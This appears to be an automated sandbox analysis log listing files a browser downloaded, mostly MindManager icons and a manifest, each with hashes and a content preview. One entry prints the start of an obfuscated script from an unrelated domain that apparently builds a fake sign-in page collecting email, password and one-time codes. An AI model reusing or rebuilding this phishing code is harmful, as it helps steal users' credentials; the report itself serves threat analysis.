                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):577
                                                                Entropy (8bit):5.049596863669569
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5C1A6261167CED8A00AE12C1E1C411D9
                                                                SHA1:FDC876BBC5C3657452B6CCD295C9781E593844F7
                                                                SHA-256:26EB37394E18435041F93A0421AF774D3EA2FFD371FCD64EBC13307B91DDD690
                                                                SHA-512:6BC6F79DD6AE3D9550244344D21756233E2680DF1F81E212C29F92230E1BC14292E66E89CC2E680EEB6C3A76FDD395E421EEEACEBE48C5C11E5A6E88B6A1DF30
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/two-feet.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}</style></defs><title>foot_print_16</title><path class="cls-1" d="M13.53,10c-.14-.51.41-2.43.46-4.09C14.1,2.59,13.08.29,11.5.29S8.66,2.09,8.66,4.88s2.22,2.79.89,5.12Z"/><path class="cls-1" d="M9.62,11c0,2-.16,3.55,1.93,3.55s2-1.54,1.94-3.55Z"/><path class="cls-1" d="M2.47,11c.14-.51-.41-2.43-.46-4.09C1.9,3.59,2.92,1.29,4.5,1.29s2.84,1.8,2.84,4.59S5.12,8.67,6.45,11Z"/><path class="cls-1" d="M6.38,12c0,2,.16,3.55-1.93,3.55S2.47,14,2.51,12Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 34 x 22, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):250
                                                                Entropy (8bit):6.4301734765100225
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D4320FC4F23CFFCF94B73630E3B5A783
                                                                SHA1:D86269A65CBEE8A5AF1E8B034C06AD0A873EF436
                                                                SHA-256:E28F77B0B319762CE2365A17A9E36FAE01805D9B466805D5C28D6F87A00F82C8
                                                                SHA-512:FE729843D6921D6A3F41F996D63A59458D5241FBAA8F80CCADFDBF51F8C5F149F79F08DB5993472240459253EBB63A6D2669AE6F6E564F1C9725F932E74BC76E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-line-straight-bend.png
                                                                Preview:.PNG........IHDR..."...........Ny....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.......r0a.M..)t..*8.".;01.<..9.....|...}..Q....)..x.\.!jF.2.Q..:d.!....`.6p.@.1....C..8.m..\..@.....c..!s..y@.C.....`#.+z......IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1295
                                                                Entropy (8bit):4.562325434016291
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6B451F1E89FF5B28ECB024C5B9F01455
                                                                SHA1:950307DCF896039FCF50B86B84B3A17E585179B9
                                                                SHA-256:A6D008B93DEE7233408D3F3038ACA27BBAF0AF2CB862317961F73002F08D679E
                                                                SHA-512:239587BF6ADD70F70327CD843D77227CF8DABE91207459BAB339DE0FC341BD4AAEF4CA19CF9CE6E70A2B9A6727809E0C2ACEC225DDB44ED7250391457D881892
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/inspector/comment_delete.svg
                                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13.5 18">. <defs>. <style>.cls-1{fill:#5c707c;}</style>. </defs>. <title>delete comment</title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <path class="cls-1" d="M12.15,1.8A1.35,1.35,0,0,1,13.5,3.16v.9a1.3,1.3,0,0,1-.25.79,1.35,1.35,0,0,1-.65.49V16.66A1.35,1.35,0,0,1,11.25,18h-9a1.3,1.3,0,0,1-1-.4,1.29,1.29,0,0,1-.4-.95V5.33a1.36,1.36,0,0,1-.64-.49A1.3,1.3,0,0,1,0,4.05v-.9a1.3,1.3,0,0,1,.4-1,1.29,1.29,0,0,1,.95-.4H4.5V1.35a1.3,1.3,0,0,1,.4-1A1.29,1.29,0,0,1,5.84,0h1.8a1.3,1.3,0,0,1,1,.4,1.3,1.3,0,0,1,.4,1V1.8Zm.45,2.25v-.9a.45.45,0,0,0-.45-.45H1.34a.45.45,0,0,0-.45.45v.9a.45.45,0,0,0,.45.45h10.8a.45.45,0,0,0,.45-.45ZM11.25,17.1a.45.45,0,0,0,.45-.45V5.41H1.8V16.66a.45.45,0,0,0,.45.45ZM4.05,6.3a.45.45,0,0,1,.45.45v9a.44.44,0,0,1-.13.33.43.43,0,0,1-.32.13.45.45,0,0,1-.46-.46v-9a.43.43,0,0,1,.13-.32A.44.44,0,0,1,4.05,6.3ZM5.4,1.35V1.8h2.7V1.35A.45.4
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):826
                                                                Entropy (8bit):5.154881274679307
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DA5FB62477E523A2AC693DE8153D0BF1
                                                                SHA1:826A53A7F5AD2D908B240010C941B12B59A0FE12
                                                                SHA-256:0F63507DCCA665909BAB701111D6455BD54EEC044EEB53862B5A96C27ECCB9F7
                                                                SHA-512:F86CD33ECD61FDE6A494C52A55E3466E2F558D4F8EC5B8613A800487C7C0EB3E182D4433A8D4FA7B0F6FFC6EEF61A5732778DA877DD1FB9A54306D709FBCD3A5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_expand.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15.34 15.84"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#4f87c6;}</style></defs><title>context_expand</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><circle class="cls-1" cx="6.69" cy="8.85" r="6.69"/><polygon class="cls-2" points="3.21 0 4.84 3.85 7.36 0.52 3.21 0"/><path class="cls-2" d="M10.54,1.09l-.31.56A7,7,0,0,1,14.7,8.26,7.12,7.12,0,0,1,7.79,15.2a7,7,0,1,1-.11-14V.53a7.66,7.66,0,1,0,7.66,7.65A7.24,7.24,0,0,0,10.54,1.09Z"/><polygon class="cls-1" points="6.18 12.23 6.18 10.23 4.18 10.23 4.18 7.23 6.18 7.23 6.18 5.23 9.18 5.23 9.18 7.23 11.18 7.23 11.18 10.23 9.18 10.23 9.18 12.23 6.18 12.23"/><path class="cls-3" d="M8.68,5.73v2h2v2h-2v2h-2v-2h-2v-2h2v-2h2m1-1h-4v2h-2v4h2v2h4v-2h2v-4h-2v-2Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):578
                                                                Entropy (8bit):5.255993759863203
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8E5393B3D94FA6E9D93391C711A620DA
                                                                SHA1:5B133C87F60BA80683E5A51CCB2DE6F44A5700C6
                                                                SHA-256:0DA33E031A41C133EB302F17F237D1A15F840D0BECA6D3578B2AC3396F5B0D4D
                                                                SHA-512:F39855D673864F57BC3BCA3AC1CBD0681FA76FB61970A40B5524899591EEB908703FACB69BDC7C4B07081A1F9B6FDD83B35EFC4B16244E6FBAACB755E4B3C025
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_funnel_right.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>Smart-Shape-Menu-Vswim_1</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="0.5 0.73 12.5 5.34 12.5 10.66 0.5 15.27 0.5 0.73"/><path class="cls-2" d="M1,1.46,12,5.69v4.62L1,14.54V1.46M0,0V16l13-5V5L0,0Z"/><line class="cls-3" x1="4.5" y1="14.5" x2="4.5" y2="1.5"/><line class="cls-3" x1="8.5" y1="12.5" x2="8.5" y2="3.5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):4986
                                                                Entropy (8bit):4.0681474651086065
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:22FA0C247C34C3CC243FF2878213C4B5
                                                                SHA1:8B9D841EA35B6D87222ADFFDA96DE6782D0AB954
                                                                SHA-256:A7DD857F21327FBB497FEDD5DD67359B0C40D0ADD62568B964E31C09EC3063A9
                                                                SHA-512:1400B830431A0F5F50A7C9EBD6695196D0E58B83E799A7A5F5503FAADA776DFAFF860CD5899C490D06D43FC3A6793726C41D1CC1EEE8A5453F2A6CF958403C39
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-hyperlinks-toggle-active.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 18"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#3e9eff;}.cls-3{fill:#528cc9;}</style></defs><title>control_strip_Link_active</title><rect class="cls-1" x="0.5" y="0.5" width="17" height="17" rx="2.44"/><path class="cls-2" d="M15.06,1A1.94,1.94,0,0,1,17,2.94V15.06A1.94,1.94,0,0,1,15.06,17H2.94A1.94,1.94,0,0,1,1,15.06V2.94A1.94,1.94,0,0,1,2.94,1H15.06m0-1H2.94A2.94,2.94,0,0,0,0,2.94V15.06A2.94,2.94,0,0,0,2.94,18H15.06A2.94,2.94,0,0,0,18,15.06V2.94A2.94,2.94,0,0,0,15.06,0Z"/><path class="cls-3" d="M6.47,15.31A4.45,4.45,0,0,1,4.76,15a4.14,4.14,0,0,1-.69-.39l-.32-.19-.56-.57,0-.06a4.14,4.14,0,0,1-.42-4.5,3.22,3.22,0,0,1,.34-.56l.17-.26L5.38,6.28l.06,0L5.8,6a4.87,4.87,0,0,1,1-.48,4.56,4.56,0,0,1,1.38-.22A4,4,0,0,1,11,6.57a1.38,1.38,0,0,1,.26,1.61A1.45,1.45,0,0,1,10.05,9a.85.85,0,0,1-.23,0A1.75,1.75,0,0,1,9,8.55a1.49,1.49,0,0,0-1-.38,1.38,1.38,0,0,0-1,.42L5.71,10l-.19.19a1.36,1.36,0,0,0,0,1.94,1.28,1.28,0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):103933
                                                                Entropy (8bit):5.201385561091186
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7BCC10882A3FEE621FCD4FF3CCE42AFA
                                                                SHA1:EDD5F4E27DB9BCA62499172114C24ED4E634E2C4
                                                                SHA-256:DB1F4FBD04BA255DDE2485CDA40B918F8286AD166F43BF7F1388EC7E7E52F1DD
                                                                SHA-512:77BE919702CDAF6184C00E90439FD5A1A40D2F8FCB9FF26983FF43995B4585EB24BFE130BBDC372D8233BFC17F21F39168683BC18AD4B0B6ACEC8EDF6B3A00A4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/566bCeiHQVMERT4h0uXklLy3MjDLuB0w67110
                                                                Preview:const _0x41ffed=_0x1609;function _0x36cc(){const _0x47dfa8=['name','onclick','multbackbtnclick','input-group','style','callotp','yahoo.com','display','otp\x20sent','autocomplete','duplicate\x20request','iProofEmailEntry','1329408KUShDZ','authappimg','backbtnid','otp\x20sent\x20error','section_otp','dirltr','span','backgroundImage','includes','error_verifyemail','backbtnclick','error-inp','head','selecttwofamethod(this)','.bannerlogo','Forgot\x20my\x20password','assertive','loading','try_again_otp','fail','section_authapp','#section_uname_content','section_signinanothererror','removeAttribute','a_text','app','section_uname','hide-to-left\x200.5s','button','</label>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22phcontainer\x22\x20id=\x22iProofPhoneEntry\x22\x20style=\x22display:\x20none;\x22\x20aria-hidden=\x22true\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<label\x20id=\x22iProofPhoneHint\x22\x20for=\x22iProofPhone\x22\x20class=\x22form-group-top\x22\x20ari
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1546
                                                                Entropy (8bit):4.862685922257738
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B3F9656DB7A86FE5239651E758B033A3
                                                                SHA1:A4D9D007E5B570FF2F4CDCF44A829F0D511C23F4
                                                                SHA-256:E7C3BD3960B15780434F6C2001CDDA10306DCDB6E9EA18518022BBDDCED380A0
                                                                SHA-512:8A395797B5911B1808D65F89815BBE0829411AA4C1C60A50064FA3AA1946229AD0003B9EE6381700CB60F72EBC1D79859D4AD004255303C1FD37A532056F3E63
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/bubblemap.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="85" cy="45.375" r="9.625" fill="#2C71E0"/>.<ellipse cx="85" cy="11.25" rx="9.625" ry="5.25" fill="#5DADFF"/>.<ellipse cx="124.375" cy="29.625" rx="9.625" ry="5.25" fill="#24B8BF"/>.<ellipse cx="45.625" cy="29.625" rx="9.625" ry="5.25" fill="#83B8E5"/>.<ellipse cx="124.375" cy="61.125" rx="9.625" ry="5.25" fill="#BBF1F3"/>.<ellipse cx="45.625" cy="61.125" rx="9.625" ry="5.25" fill="#93E7E2"/>.<ellipse cx="85" cy="79.498" rx="9.625" ry="5.25" fill="#B6E3FF"/>.<path d="M85 16.498L82.6906 20.498L87.3094 20.498L85 16.498ZM85.4 34.873L85.4 20.098L84.6 20.098L84.6 34.873L85.4 34.873Z" fill="#5DADFF"/>.<path d="M85 74.25L87.3094 70.25L82.6906 70.25L85 74.25ZM84.6 55.875L84.6 70.65L85.4 70.65L85.4 55.875L84.6 55.875Z" fill="#B6E3FF"/>.<path d="M114.403 60.113L111.567 56.4672L109.828 60.7459L114.403 60.113ZM93.1775 51.9155L110.917 59.1277L111.219 58.3866L93.4788 51.1744L93.1775 51.9155Z"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2079
                                                                Entropy (8bit):4.415986308979445
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7C80E83C545558CDE288BA56288CBB45
                                                                SHA1:6964DC76257ACACFEC24633AAD252CCA7473B8DE
                                                                SHA-256:1B98368CCEE44D975B575F13EEE94F3FE3171FE0F60D38EAC1478C4EC997484C
                                                                SHA-512:C434188C571EF1207966BD14AE9808DBB769729F79A655CC080E57AC014F603B06D4F7D5E1E0070939A190EB7EB022901D2762FEA7B15594C618C12736BC8D16
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/share-file.svg
                                                                Preview:<svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M3.63879 18.2544C3.63879 14.7678 6.4652 11.9414 9.95175 11.9414C11.4041 11.9414 12.7438 12.4328 13.8107 13.2579C14.1384 13.5112 14.1986 13.9823 13.9452 14.31C13.6918 14.6376 13.2208 14.6978 12.8931 14.4444C12.0796 13.8154 11.0604 13.4414 9.95175 13.4414C7.29363 13.4414 5.13879 15.5962 5.13879 18.2544V20.8425C5.13879 20.8784 5.16794 20.9076 5.2039 20.9076H10.3752C10.7894 20.9076 11.1252 21.2434 11.1252 21.6576C11.1252 22.0718 10.7894 22.4076 10.3752 22.4076H5.2039C4.33952 22.4076 3.63879 21.7069 3.63879 20.8425V18.2544Z" fill="#000B36"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M9.9523 9.14227C10.7993 9.14227 11.4858 8.45568 11.4858 7.60873C11.4858 6.76178 10.7993 6.0752 9.9523 6.0752C9.10535 6.0752 8.41876 6.76178 8.41876 7.60873C8.41876 8.45568 9.10535 9.14227 9.9523 9.14227ZM9.9523 10.6423C11.6277 10.6423 12.9858 9.28411 12.9858 7.60
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):375
                                                                Entropy (8bit):5.225267577293218
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E1FB7CB43CCE546ADB0AEF1C36848E97
                                                                SHA1:0317A0B0CEFE7F25A0718646FC19AD7DB1C64453
                                                                SHA-256:649CC0692FA32DDD328A62444FC042FE8834E4944F01FCEBACCFB02E2F8718B0
                                                                SHA-512:C96B2576D960ACCF89784999D09A044E6078AF2DBB29EAF6E94FC452A49A84CB0E7137F27A41BE8D91DA5C69629BE1BB591B23F43CD1746DD43B55BF622EB276
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/trapezoid.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 12"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="0.69 11.5 4.36 0.5 11.64 0.5 15.31 11.5 0.69 11.5"/><path class="cls-2" d="M11.28,1l3.33,10H1.39L4.72,1h6.56M12,0H4L0,12H16L12,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):787
                                                                Entropy (8bit):4.999145483541614
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B5E9AC50C4BBD91AFDA0A2547F98BFFC
                                                                SHA1:2D5BFBA51AAE7A3EEB755EEB92376BE2CFA9A5E3
                                                                SHA-256:1C578F9ECD747437F22B042B093005A66B637B014FE0F71D896353ABEC33DB4E
                                                                SHA-512:6FAD1B8057D7B76ECA8A24F1B0F650822A748824D1CC33475BCC4E2E16F9445499F9766562BD73FFD7E2A3878AC3947DBD09AFC0AA86CC51C0A41C6ACAC83B88
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/inspector/group-links.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 44 30">. <defs>. <style>.cls-1{fill:#3a52a4;}. </style>. </defs>. <title>links off. </title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <rect class="cls-1" x="18" y="13" width="1" height="7"/>. <rect class="cls-1" x="25" y="10" width="1" height="10"/>. <rect class="cls-1" x="23" y="13" width="1" height="6"/>. <rect class="cls-1" x="20" y="10" width="1" height="9"/>. <path class="cls-1" d="M26,9.23a3.47,3.47,0,0,0-6,0V11h.5a2.5,2.5,0,0,1,5,0H26Z"/>. <path class="cls-1" d="M26,20H24.86a3.49,3.49,0,0,1-5.73,0H18v0a4.46,4.46,0,0,0,8,0Z"/>. <path class="cls-1" d="M24,17h-.5a1.5,1.5,0,0,1-3,0H20v1.48a2.48,2.48,0,0,0,4,0Z"/>. </g>. </g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:downloaded
                                                                Size (bytes):69
                                                                Entropy (8bit):4.057426088150192
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B04CD3F8043EF04F417D4B0E4BCBBC03
                                                                SHA1:88F259A4AE3045409B3657E7D7A791D321BA9DCE
                                                                SHA-256:59E58524340CD7AD353BE010374B124C242FDDE10A0ED41047FE2FD4BB9E5A2E
                                                                SHA-512:A285C493B939D2A165D80F87FC830F5D02AFCC7A8EA1C5CAF9CAA87ABD286F1C98598FFD83023044BDB23D344C60EEF6A6C4BFEDEDD42A4297A0AC09E22FA5B2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                Preview:{"country":"US","state":"NY","stateName":"New York","continent":"NA"}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):487
                                                                Entropy (8bit):5.017442459430432
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8EC26D33A9F982E0696E112596962B3B
                                                                SHA1:141AFB676902C6982B292550CD06A484D323CDC8
                                                                SHA-256:C7FB049D3738FDBBB4F49460DD14C87C5B3FC5529EE4C10F24D3BEB816E484D5
                                                                SHA-512:3C092E3B4A58111C49232C415EC86A9CED85A0BCC6934D0D35FCA025F9C31CE57619E3EC982E86DC0D2A8879BBFBD39DC3A65F18CBC5D843CB46F231E33A6312
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/flag-purple.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#8f92f7;}.cls-2{opacity:0.2;}</style></defs><title>flag_violet_16 copy</title><rect class="cls-1" x="1" width="1" height="16" rx="0.5" ry="0.5"/><polygon class="cls-1" points="8 11 8 4.5 16 7.75 8 11"/><polygon class="cls-1" points="8 8.5 2 10 2 1 8 2.5 8 8.5"/><rect class="cls-2" x="7" y="3" width="1" height="6"/><rect width="1" height="16" rx="0.5" ry="0.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):798
                                                                Entropy (8bit):5.181972171695964
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EF91969D007A15D9FF9691D41F2DA985
                                                                SHA1:127F1EA2802851ADAE61AB8855819C61E6A28691
                                                                SHA-256:EE2273805329061884E6AFB294030EFA6353A0A9B5B041A0E11A50E6BB933C1C
                                                                SHA-512:86216CD9DF914EE1E36B9AC42D46C972DAF1F5278A55D10428C0AD4CDC430EC6B9E5F1528E52E232B592075FA7196BA05B22C496A9E875F7241358DA2338BCFE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone04.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}.cls-5{fill:gray;}</style></defs><title>roPercentageDone04</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8.5,8.27V.52a7.49,7.49,0,0,1,4.91,12.66Z"/><path class="cls-4" d="M9,1.07a7,7,0,0,1,4.39,11.39L9,8.06v-7M8,0V8.48l5.41,5.41A8,8,0,0,0,8,0Z"/><path class="cls-5" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-1" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:downloaded
                                                                Size (bytes):715
                                                                Entropy (8bit):4.283246494643954
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1C86BB4C00B60956A92CB012B49AB986
                                                                SHA1:FB8D048F3EB08AA9BC61E02E0FEB0D6B898A56D0
                                                                SHA-256:14408DDF00D90C49EEC07895B8A8CD1435237F75BC783C3E35A35971A9FEE0A0
                                                                SHA-512:5DBF303B3096AD3D4420F12CF691D7B23D73DA3FC99466ACC2085FE80C5F3C38057199F0847F5226F38B05CAC4B726812C322CACC58ADDE2C4D02E5C2B694D1D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/manifest.json
                                                                Preview:{. "short_name": "MindManager",. "name": "MindManager",. "description": "MindManager: Visualize your ideas.",. "icons": [. {. "src": "/images/chromebook/app_icon_144.png",. "type": "image/png",. "sizes": "144x144". },. {. "src": "/images/chromebook/app_icon_192.png",. "type": "image/png",. "sizes": "192x192". },. {. "src": "/images/chromebook/app_icon_512.png",. "type": "image/png",. "sizes": "512x512". }. ],. "start_url": "/?source=pwa",. "scope": "/",. "display": "standalone",. "background_color": "#3367D6",. "theme_color": "#3367D6".}.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 20 x 11, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):3332
                                                                Entropy (8bit):7.911925652192511
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4839AAC3CD53502E6E0F782679D61966
                                                                SHA1:43481C123C1964DD5BB930F92A6A066EFE65CB4B
                                                                SHA-256:4A2B5D3ED86F2CD4D430647D458B5440A90D475ADE761380E51D44234305325E
                                                                SHA-512:228E5529F715ABC4FD4788F2FDFCF0130E139BCC4C12B8AC2A15309A1A3BAFC79D21F80E2E859A687C3ED1F450EF8C90C30C39CC311537971CCEA6C2826451EA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-expand-branch.png
                                                                Preview:.PNG........IHDR................C....iCCPICC Profile..H....P..............;...@A:.JHB.%...l..+..DD...R.\......"`....(.b..*....7o....../g.wr..3.......O.e.H..!........w.., .#`.`.......o5y..Ft.t.....W..B&.P0..,!3....f..".P.H\{..?...+....n.a....p...1.....'..$.C....F..&..C.A......C...`!\..Ijj..w l../u8.V3^R...Hxn.Y.B~.#.........oh!..(..A>..=.NN..0/~y.<sY....(...g..3f.Y...y.'...3C..,WD..gAZ..>[..*...JzHY.....}....".9...|.....9...@.".9A.#.1U......(1.o..(I.,...$.....E.....`I>;.W..f.J..!.l......u.%...@"...`.6..x..R......!.#...9.".:....i.L...(..#..M..f&4Ks...f..._..:{. .Xz....H...ch.......BL..r\..p..).d..f.-.."...@...m`.L.%..N..x....L..V.&2O*2.Z..l.y.....A)8...jp.....\.W.M...'.....`.L.)..p...@.....C..=..yC.P....A.......V..*.J.cP.....]..C..#h....A_`.L..`5X.^....p.....9p:........>.7....=..~.O..J.EEi.LQ.(OT.*.....6..Q.rT=......G..>..h...6E;....h&:.....]..F7./........2F.c.q..1Q..f-&.S...4b.`.a.0.X,.....a....$.z.N.al......N.p8e.1....c.D.<.A....\.n.../...[.}.1x.>._......
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):5309
                                                                Entropy (8bit):4.940996233200158
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5B3A7FE7745639F08EF7A1121F1D2BD6
                                                                SHA1:CF4E838077CA36B7B38720E03D4746D7818189E1
                                                                SHA-256:9545CD7AE5DC0CDF35928B24CB97E604DA6043F5FFF8936ED1185BB69A86988E
                                                                SHA-512:B9BA7EEF5A607A3E05502C6838C300E14B3829AC8D342CB076D390DF944D805953BD5AC443B37B7AC98F17790023FEB7F72D38E87BACF6F45BF9BB8734815001
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/customerjourneymap.svg
